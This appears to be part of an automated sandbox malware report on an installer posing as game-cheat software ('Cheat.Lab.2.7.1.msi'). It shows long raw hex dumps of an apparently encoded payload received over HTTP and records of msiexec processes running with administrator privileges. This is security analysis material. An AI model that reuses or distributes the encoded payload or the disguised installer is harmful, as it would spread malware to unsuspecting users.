                                                    Data Ascii: 139,d8,8a,122,135,163,14a,14c,bc,9f,126,11d,123,12f,141,142,c6,8d,13b,129,11f,12a,15e,133,12e,a2,76,14f,12c,c3,87,13a,14b,154,152,117,b5,9c,13d,150,12b,e8,5f,11d,123,131,130,d4,7d,144,c9,6e,11e,12a,15f,122,c0,59,12d,dd,74,131,da,114,13c,158,151,128,123,e5
                                                    2023-11-04 00:30:16 UTC1500INData Raw: 31 2c 31 32 63 2c 31 35 64 2c 31 33 35 2c 31 33 64 2c 31 34 37 2c 31 33 33 2c 63 39 2c 61 62 2c 31 35 32 2c 31 31 36 2c 31 33 35 2c 31 35 63 2c 31 32 62 2c 31 35 65 2c 31 32 37 2c 31 35 36 2c 62 32 2c 37 38 2c 31 32 32 2c 31 31 66 2c 31 34 32 2c 31 34 36 2c 31 32 36 2c 31 35 36 2c 31 33 34 2c 31 32 35 2c 61 37 2c 37 39 2c 31 36 30 2c 31 31 66 2c 31 32 65 2c 61 30 2c 39 32 2c 31 35 63 2c 31 32 61 2c 31 34 33 2c 31 35 33 2c 31 31 64 2c 31 34 62 2c 31 34 33 2c 31 34 31 2c 61 37 2c 38 38 2c 31 36 34 2c 31 33 38 2c 31 35 65 2c 31 33 38 2c 31 36 32 2c 31 32 33 2c 61 35 2c 31 32 36 2c 62 32 2c 61 34 2c 31 32 36 2c 31 34 35 2c 64 36 2c 63 35 2c 65 34 2c 62 30 2c 62 37 2c 65 64 2c 63 66 2c 64 33 2c 66 34 2c 65 63 2c 66 38 2c 64 61 2c 63 65 2c 65 61 2c 64 63 2c 64
                                                    Data Ascii: 1,12c,15d,135,13d,147,133,c9,ab,152,116,135,15c,12b,15e,127,156,b2,78,122,11f,142,146,126,156,134,125,a7,79,160,11f,12e,a0,92,15c,12a,143,153,11d,14b,143,141,a7,88,164,138,15e,138,162,123,a5,126,b2,a4,126,145,d6,c5,e4,b0,b7,ed,cf,d3,f4,ec,f8,da,ce,ea,dc,d
                                                    2023-11-04 00:30:16 UTC1516INData Raw: 31 32 34 2c 31 30 36 2c 31 33 37 2c 31 33 64 2c 31 33 62 2c 31 33 30 2c 31 35 61 2c 31 33 32 2c 31 34 62 2c 31 34 35 2c 31 35 32 2c 31 31 66 2c 31 32 30 2c 31 35 33 2c 63 62 2c 61 31 2c 31 33 39 2c 31 35 36 2c 62 34 2c 36 63 2c 31 30 37 2c 31 32 34 2c 31 33 64 2c 31 34 64 2c 31 34 34 2c 31 34 65 2c 31 32 62 2c 31 33 37 2c 31 32 32 2c 31 31 35 2c 31 34 66 2c 62 34 2c 39 37 2c 31 32 31 2c 31 32 31 2c 31 35 64 2c 31 33 35 2c 31 32 65 2c 31 34 61 2c 63 35 2c 39 65 2c 31 35 36 2c 31 33 35 2c 31 32 39 2c 31 33 33 2c 31 35 66 2c 31 32 62 2c 31 35 64 2c 31 32 39 2c 31 36 37 2c 31 32 31 2c 31 32 35 2c 31 31 37 2c 31 32 62 2c 31 33 66 2c 31 33 66 2c 31 33 34 2c 64 36 2c 61 38 2c 31 33 36 2c 31 31 37 2c 61 38 2c 62 39 2c 31 32 36 2c 31 33 32 2c 31 31 38 2c 31 31 66
                                                    Data Ascii: 124,106,137,13d,13b,130,15a,132,14b,145,152,11f,120,153,cb,a1,139,156,b4,6c,107,124,13d,14d,144,14e,12b,137,122,115,14f,b4,97,121,121,15d,135,12e,14a,c5,9e,156,135,129,133,15f,12b,15d,129,167,121,125,117,12b,13f,13f,134,d6,a8,136,117,a8,b9,126,132,118,11f
                                                    2023-11-04 00:30:16 UTC1532INData Raw: 31 35 37 2c 62 33 2c 31 31 63 2c 31 32 32 2c 31 32 65 2c 31 33 61 2c 31 34 64 2c 31 34 35 2c 31 34 31 2c 31 33 38 2c 62 36 2c 31 32 30 2c 31 32 39 2c 31 35 61 2c 31 32 65 2c 31 32 62 2c 31 31 31 2c 62 65 2c 31 35 34 2c 31 33 63 2c 31 33 63 2c 31 35 31 2c 31 33 30 2c 31 33 39 2c 64 38 2c 61 61 2c 31 32 38 2c 31 32 30 2c 31 35 34 2c 63 61 2c 31 35 35 2c 31 33 62 2c 31 36 31 2c 31 32 63 2c 31 31 65 2c 31 32 32 2c 31 31 64 2c 31 33 31 2c 64 33 2c 31 33 64 2c 31 35 35 2c 31 34 30 2c 31 33 31 2c 31 31 34 2c 31 31 39 2c 65 30 2c 31 32 62 2c 31 33 66 2c 31 31 39 2c 31 33 34 2c 31 34 38 2c 31 32 62 2c 63 33 2c 62 33 2c 31 34 34 2c 31 33 36 2c 31 34 37 2c 64 32 2c 31 32 30 2c 31 33 34 2c 31 35 63 2c 31 34 33 2c 31 35 37 2c 31 33 62 2c 31 35 33 2c 31 32 33 2c 61 34
                                                    Data Ascii: 157,b3,11c,122,12e,13a,14d,145,141,138,b6,120,129,15a,12e,12b,111,be,154,13c,13c,151,130,139,d8,aa,128,120,154,ca,155,13b,161,12c,11e,122,11d,131,d3,13d,155,140,131,114,119,e0,12b,13f,119,134,148,12b,c3,b3,144,136,147,d2,120,134,15c,143,157,13b,153,123,a4
                                                    2023-11-04 00:30:16 UTC1548INData Raw: 35 2c 61 34 2c 33 39 2c 31 34 66 2c 61 66 2c 31 34 62 2c 31 31 30 2c 62 61 2c 31 36 34 2c 31 33 34 2c 31 32 61 2c 31 35 35 2c 31 33 65 2c 31 33 36 2c 31 34 36 2c 64 33 2c 38 38 2c 31 33 34 2c 31 35 33 2c 63 39 2c 38 32 2c 31 32 61 2c 65 34 2c 63 62 2c 31 30 38 2c 31 31 35 2c 31 32 61 2c 31 33 30 2c 64 32 2c 36 61 2c 31 34 34 2c 63 35 2c 63 65 2c 31 31 37 2c 61 36 2c 66 38 2c 31 32 65 2c 31 34 30 2c 31 32 31 2c 31 32 64 2c 64 37 2c 31 33 63 2c 31 33 35 2c 31 34 64 2c 31 33 65 2c 31 34 36 2c 31 34 36 2c 63 65 2c 33 63 2c 31 32 33 2c 65 30 2c 35 61 2c 31 34 63 2c 62 37 2c 31 37 33 2c 31 32 32 2c 61 30 2c 31 32 61 2c 31 32 34 2c 31 32 65 2c 31 34 64 2c 31 34 31 2c 31 34 31 2c 31 33 37 2c 62 37 2c 38 38 2c 31 32 39 2c 31 35 33 2c 31 32 32 2c 62 62 2c 33 35 2c
                                                    Data Ascii: 5,a4,39,14f,af,14b,110,ba,164,134,12a,155,13e,136,146,d3,88,134,153,c9,82,12a,e4,cb,108,115,12a,130,d2,6a,144,c5,ce,117,a6,f8,12e,140,121,12d,d7,13c,135,14d,13e,146,146,ce,3c,123,e0,5a,14c,b7,173,122,a0,12a,124,12e,14d,141,141,137,b7,88,129,153,122,bb,35,
                                                    2023-11-04 00:30:16 UTC1564INData Raw: 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c
                                                    Data Ascii: 42,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,
                                                    2023-11-04 00:30:16 UTC1580INData Raw: 31 33 34 2c 61 31 2c 63 66 2c 31 33 66 2c 31 31 61 2c 39 64 2c 65 63 2c 31 35 63 2c 31 34 36 2c 61 38 2c 66 66 2c 31 35 33 2c 31 32 61 2c 39 30 2c 31 30 39 2c 31 34 62 2c 31 35 66 2c 39 35 2c 31 30 61 2c 31 33 34 2c 31 32 36 2c 37 61 2c 64 31 2c 31 34 32 2c 31 35 35 2c 39 62 2c 66 33 2c 31 34 39 2c 31 33 38 2c 37 63 2c 63 35 2c 31 36 31 2c 31 33 35 2c 39 31 2c 62 62 2c 31 33 66 2c 31 35 65 2c 38 63 2c 64 61 2c 31 35 63 2c 31 34 36 2c 39 38 2c 65 63 2c 31 35 33 2c 31 32 61 2c 38 30 2c 66 37 2c 31 34 62 2c 31 35 66 2c 61 30 2c 31 30 38 2c 31 31 61 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 38 63 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 38 64 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 39 66 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 37 37 2c 31 35 65 2c 31 33 64 2c 31 34
                                                    Data Ascii: 134,a1,cf,13f,11a,9d,ec,15c,146,a8,ff,153,12a,90,109,14b,15f,95,10a,134,126,7a,d1,142,155,9b,f3,149,138,7c,c5,161,135,91,bb,13f,15e,8c,da,15c,146,98,ec,153,12a,80,f7,14b,15f,a0,108,11a,126,123,132,8c,155,146,156,8d,138,129,12a,9f,135,140,122,77,15e,13d,14
                                                    2023-11-04 00:30:16 UTC1596INData Raw: 33 35 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 31 34 33 2c 31 35 35 2c 31 30 33 2c 31 31 33 2c 38 32 2c 31 33 38 2c 61 39 2c 37 32 2c 31 36 36 2c 31 33 35 2c 62 66 2c 36 39 2c 31 34 34 2c 31 35 65 2c 62 62 2c 38 61 2c 31 36 31 2c 31 34 36 2c 63 39 2c 39 66 2c 31 35 38 2c 31 32 61 2c 62 33 2c 61 63 2c 31 35 30 2c 31 35 66 2c 62 62 2c 61 66 2c 31 33 39 2c 31 32 36 2c 61 33 2c 37 61 2c 31 34 37 2c 31 35 35 2c 63 38 2c 39 66 2c 31 34 64 2c 31 33 38 2c 61 64 2c 37 35 2c 31 36 35 2c 31 33 35 2c 63 36 2c 36 65 2c 31 34 33 2c 31 35 65 2c 63 36 2c 39 31 2c 31 36 30 2c 31 34 36 2c 64 38 2c 61 38 2c 31 35 36 2c 31 32 61 2c 63 35 2c 62 38 2c 31 34 65 2c 31 35 66 2c 65 38 2c 65 33 2c 34 36 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 38 62 2c 31 35 35 2c 31 34 36 2c 31 35 36
                                                    Data Ascii: 35,126,123,132,143,155,103,113,82,138,a9,72,166,135,bf,69,144,15e,bb,8a,161,146,c9,9f,158,12a,b3,ac,150,15f,bb,af,139,126,a3,7a,147,155,c8,9f,14d,138,ad,75,165,135,c6,6e,143,15e,c6,91,160,146,d8,a8,156,12a,c5,b8,14e,15f,e8,e3,46,126,123,132,8b,155,146,156
                                                    2023-11-04 00:30:16 UTC1612INData Raw: 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31
                                                    Data Ascii: 5,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,1
                                                    2023-11-04 00:30:16 UTC1628INData Raw: 32 61 2c 37 62 2c 61 62 2c 66 39 2c 31 35 66 2c 37 66 2c 61 66 2c 65 34 2c 31 32 36 2c 35 65 2c 36 38 2c 64 63 2c 31 35 35 2c 37 39 2c 38 34 2c 64 61 2c 31 33 38 2c 35 34 2c 35 31 2c 65 61 2c 31 33 35 2c 36 35 2c 34 34 2c 63 31 2c 31 35 65 2c 35 63 2c 36 30 2c 64 38 2c 31 34 36 2c 36 35 2c 37 30 2c 63 39 2c 31 32 61 2c 35 65 2c 38 63 2c 62 39 2c 31 35 66 2c 39 63 2c 63 37 2c 39 33 2c 31 32 36 2c 62 64 2c 63 63 2c 39 34 2c 31 35 35 2c 31 31 64 2c 31 32 64 2c 38 65 2c 31 33 38 2c 31 32 37 2c 31 32 38 2c 39 64 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 37 37 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 39 31 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 38 36 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 37 63 2c 31 35 66 2c 31 33 63 2c 31 36 38 2c 36 34 2c 31 32 36 2c 31 32 33 2c
                                                    Data Ascii: 2a,7b,ab,f9,15f,7f,af,e4,126,5e,68,dc,155,79,84,da,138,54,51,ea,135,65,44,c1,15e,5c,60,d8,146,65,70,c9,12a,5e,8c,b9,15f,9c,c7,93,126,bd,cc,94,155,11d,12d,8e,138,127,128,9d,135,140,122,77,15e,13d,143,91,146,14b,158,86,12a,135,165,7c,15f,13c,168,64,126,123,
                                                    2023-11-04 00:30:16 UTC1644INData Raw: 2c 62 30 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 61 37 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 39 66 2c 31 35 66 2c 31 31 63 2c 31 33 38 2c 37 32 2c 31 32 36 2c 62 32 2c 38 34 2c 31 34 35 2c 31 35 35 2c 64 37 2c 61 61 2c 31 34 63 2c 31 33 38 2c 62 61 2c 38 38 2c 31 36 38 2c 31 33 35 2c 63 63 2c 39 66 2c 35 30 2c 31 35 65 2c 63 39 2c 63 30 2c 36 64 2c 31 34 36 2c 64 37 2c 64 35 2c 36 34 2c 31 32 61 2c 63 64 2c 63 64 2c 31 35 31 2c 31 35 66 2c 64 65 2c 63 37 2c 31 33 35 2c 31 32 36 2c 63 35 2c 39 32 2c 31 34 35 2c 31 35 35 2c 31 31 35 2c 31 32 33 2c 38 63 2c 35 39 2c 31 32 39 2c 31 32 61 2c 38 30 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 36 33 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 38 35 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 38 33 2c 31 32 61 2c 31 33 35 2c 31
                                                    Data Ascii: ,b0,146,14b,158,a7,12a,135,165,9f,15f,11c,138,72,126,b2,84,145,155,d7,aa,14c,138,ba,88,168,135,cc,9f,50,15e,c9,c0,6d,146,d7,d5,64,12a,cd,cd,151,15f,de,c7,135,126,c5,92,145,155,115,123,8c,59,129,12a,80,135,140,122,63,15e,13d,143,85,146,14b,158,83,12a,135,1
                                                    2023-11-04 00:30:16 UTC1660INData Raw: 2c 31 34 30 2c 31 32 32 2c 35 38 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 37 62 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 37 37 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 37 36 2c 31 35 66 2c 31 33 63 2c 31 36 38 2c 36 36 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 37 62 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 38 38 2c 66 30 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32
                                                    Data Ascii: ,140,122,58,15e,13d,143,7b,146,14b,158,77,12a,135,165,76,15f,13c,168,66,126,123,132,7b,155,146,156,88,f0,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,12
                                                    2023-11-04 00:30:16 UTC1676INData Raw: 34 30 2c 31 32 32 2c 35 37 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 37 37 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 37 31 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 36 63 2c 31 35 66 2c 31 33 63 2c 31 36 38 2c 35 39 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 36 62 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 37 37 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 39 34 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 37 38 2c 39 37 2c 31 33 64 2c 31 34 33 2c 61 33 2c 31 33 61 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66
                                                    Data Ascii: 40,122,57,15e,13d,143,77,146,14b,158,71,12a,135,165,6c,15f,13c,168,59,126,123,132,6b,155,146,156,77,138,129,12a,94,135,140,122,78,97,13d,143,a3,13a,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f
                                                    2023-11-04 00:30:16 UTC1692INData Raw: 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 37 2c 31 36 32 2c 31 33 35 2c 31 34 31 2c 31 32 33 2c 37 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 35 2c 31 35 34 2c 31 32 61 2c 31 33 36 2c 31 36 36 2c 38 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 32 62 2c 31 34 33 2c 31 35 35 2c 31 34 37 2c 31 35 37 2c 36 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 31 62 2c 31 34 30 2c 31 35 65 2c 31 33 65 2c 31 34 34 2c 37 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 35 36 2c 31 34 63 2c 31 35 66 2c 31 33 64 2c 31 36 39 2c 34 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 33 37 2c 31 34 61 2c
                                                    Data Ascii: 149,137,129,127,162,135,141,123,7f,15d,13d,143,15c,145,14b,155,154,12a,136,166,8b,15e,13c,168,134,125,123,12b,143,155,147,157,69,137,129,12a,161,134,140,11b,140,15e,13e,144,7c,145,14b,158,153,129,135,156,14c,15f,13d,169,44,125,123,132,142,154,146,137,14a,
                                                    2023-11-04 00:30:16 UTC1708INData Raw: 34 33 2c 33 34 2c 62 34 2c 34 31 2c 35 31 2c 36 33 2c 35 65 2c 36 35 2c 35 38 2c 34 36 2c 62 62 2c 33 39 2c 37 30 2c 34 33 2c 36 35 2c 33 31 2c 34 65 2c 36 63 2c 64 30 2c 35 32 2c 36 62 2c 35 34 2c 36 37 2c 36 37 2c 36 32 2c 33 38 2c 64 35 2c 37 34 2c 35 61 2c 36 64 2c 37 34 2c 37 37 2c 34 33 2c 33 34 2c 64 30 2c 34 31 2c 35 31 2c 36 33 2c 36 32 2c 36 35 2c 35 38 2c 34 36 2c 64 39 2c 33 39 2c 37 30 2c 34 33 2c 35 31 2c 33 31 2c 34 65 2c 36 63 2c 66 30 2c 35 32 2c 36 62 2c 35 34 2c 36 35 2c 36 37 2c 36 32 2c 33 38 2c 65 62 2c 37 34 2c 35 61 2c 36 64 2c 35 38 2c 37 37 2c 34 33 2c 33 34 2c 65 39 2c 34 31 2c 35 31 2c 36 33 2c 36 36 2c 36 35 2c 35 38 2c 34 36 2c 31 30 36 2c 33 39 2c 37 30 2c 34 33 2c 35 31 2c 33 31 2c 34 65 2c 36 63 2c 31 32 33 2c 35 32 2c 36
                                                    Data Ascii: 43,34,b4,41,51,63,5e,65,58,46,bb,39,70,43,65,31,4e,6c,d0,52,6b,54,67,67,62,38,d5,74,5a,6d,74,77,43,34,d0,41,51,63,62,65,58,46,d9,39,70,43,51,31,4e,6c,f0,52,6b,54,65,67,62,38,eb,74,5a,6d,58,77,43,34,e9,41,51,63,66,65,58,46,106,39,70,43,51,31,4e,6c,123,52,6
                                                    2023-11-04 00:30:16 UTC1724INData Raw: 39 34 2c 65 61 2c 39 39 2c 39 35 2c 39 65 2c 61 61 2c 62 35 2c 61 66 2c 63 34 2c 63 38 2c 62 39 2c 62 32 2c 39 64 2c 33 39 2c 31 32 31 2c 34 34 2c 39 36 2c 39 36 2c 63 32 2c 62 66 2c 63 30 2c 63 34 2c 64 34 2c 63 32 2c 63 31 2c 62 62 2c 64 62 2c 61 38 2c 61 39 2c 62 35 2c 35 61 2c 31 32 31 2c 34 63 2c 62 65 2c 61 38 2c 61 38 2c 38 35 2c 62 35 2c 63 33 2c 63 63 2c 63 33 2c 63 63 2c 61 63 2c 62 66 2c 61 38 2c 39 65 2c 63 37 2c 34 33 2c 36 38 2c 33 33 2c 39 37 2c 64 61 2c 62 35 2c 63 36 2c 64 34 2c 62 35 2c 63 36 2c 64 30 2c 64 63 2c 39 64 2c 38 37 2c 65 36 2c 63 33 2c 65 31 2c 62 34 2c 64 61 2c 61 34 2c 61 30 2c 38 35 2c 61 36 2c 62 34 2c 64 37 2c 62 65 2c 64 34 2c 63 36 2c 38 37 2c 61 36 2c 39 64 2c 63 33 2c 62 33 2c 62 38 2c 39 66 2c 39 31 2c 64 62 2c 63
                                                    Data Ascii: 94,ea,99,95,9e,aa,b5,af,c4,c8,b9,b2,9d,39,121,44,96,96,c2,bf,c0,c4,d4,c2,c1,bb,db,a8,a9,b5,5a,121,4c,be,a8,a8,85,b5,c3,cc,c3,cc,ac,bf,a8,9e,c7,43,68,33,97,da,b5,c6,d4,b5,c6,d0,dc,9d,87,e6,c3,e1,b4,da,a4,a0,85,a6,b4,d7,be,d4,c6,87,a6,9d,c3,b3,b8,9f,91,db,c
                                                    2023-11-04 00:30:16 UTC1740INData Raw: 37 2c 65 38 2c 66 37 2c 35 34 2c 31 32 63 2c 31 30 38 2c 65 36 2c 38 36 2c 63 61 2c 31 31 30 2c 65 38 2c 31 32 64 2c 31 31 39 2c 39 35 2c 31 32 31 2c 35 62 2c 31 33 65 2c 62 34 2c 61 39 2c 39 66 2c 31 30 64 2c 62 30 2c 35 39 2c 64 36 2c 37 35 2c 64 34 2c 64 65 2c 37 36 2c 31 32 38 2c 39 64 2c 36 39 2c 31 34 66 2c 37 39 2c 65 35 2c 66 61 2c 31 33 64 2c 31 35 35 2c 62 37 2c 37 65 2c 38 62 2c 64 65 2c 31 33 39 2c 37 36 2c 35 39 2c 62 33 2c 31 31 36 2c 38 36 2c 31 33 37 2c 36 37 2c 39 30 2c 36 30 2c 38 34 2c 35 39 2c 31 35 32 2c 31 31 65 2c 35 30 2c 31 32 38 2c 31 31 62 2c 62 32 2c 39 62 2c 37 38 2c 31 30 64 2c 64 30 2c 63 30 2c 31 32 37 2c 62 33 2c 36 65 2c 66 61 2c 66 64 2c 35 63 2c 63 31 2c 31 31 32 2c 31 37 33 2c 39 62 2c 31 32 66 2c 39 65 2c 34 31 2c 31
                                                    Data Ascii: 7,e8,f7,54,12c,108,e6,86,ca,110,e8,12d,119,95,121,5b,13e,b4,a9,9f,10d,b0,59,d6,75,d4,de,76,128,9d,69,14f,79,e5,fa,13d,155,b7,7e,8b,de,139,76,59,b3,116,86,137,67,90,60,84,59,152,11e,50,128,11b,b2,9b,78,10d,d0,c0,127,b3,6e,fa,fd,5c,c1,112,173,9b,12f,9e,41,1
                                                    2023-11-04 00:30:16 UTC1756INData Raw: 2c 62 66 2c 37 64 2c 36 33 2c 39 62 2c 36 33 2c 36 30 2c 36 61 2c 62 37 2c 33 63 2c 34 65 2c 38 37 2c 36 32 2c 62 31 2c 62 34 2c 64 65 2c 61 63 2c 37 37 2c 39 37 2c 62 33 2c 63 35 2c 39 34 2c 37 39 2c 39 35 2c 37 61 2c 34 63 2c 33 62 2c 38 65 2c 37 34 2c 34 36 2c 36 32 2c 34 63 2c 39 32 2c 64 35 2c 62 33 2c 62 62 2c 61 65 2c 62 39 2c 63 63 2c 64 62 2c 38 32 2c 38 63 2c 61 64 2c 65 31 2c 62 66 2c 65 30 2c 62 66 2c 64 38 2c 62 30 2c 61 34 2c 35 32 2c 37 33 2c 38 31 2c 39 35 2c 38 37 2c 38 35 2c 38 35 2c 36 36 2c 36 61 2c 36 39 2c 66 32 2c 34 35 2c 37 31 2c 36 31 2c 35 62 2c 37 32 2c 35 35 2c 37 63 2c 66 31 2c 39 63 2c 65 30 2c 31 35 65 2c 36 66 2c 33 39 2c 34 35 2c 37 35 2c 35 66 2c 36 64 2c 34 65 2c 66 39 2c 34 35 2c 34 33 2c 33 32 2c 37 31 2c 64 33 2c 36
                                                    Data Ascii: ,bf,7d,63,9b,63,60,6a,b7,3c,4e,87,62,b1,b4,de,ac,77,97,b3,c5,94,79,95,7a,4c,3b,8e,74,46,62,4c,92,d5,b3,bb,ae,b9,cc,db,82,8c,ad,e1,bf,e0,bf,d8,b0,a4,52,73,81,95,87,85,85,66,6a,69,f2,45,71,61,5b,72,55,7c,f1,9c,e0,15e,6f,39,45,75,5f,6d,4e,f9,45,43,32,71,d3,6


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:01:29:51
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
                                                    Imagebase:0x7ff6bc750000
                                                    File size:69'632 bytes
                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:01:29:52
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                    Imagebase:0x7ff6bc750000
                                                    File size:69'632 bytes
                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:3
                                                    Start time:01:29:52
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
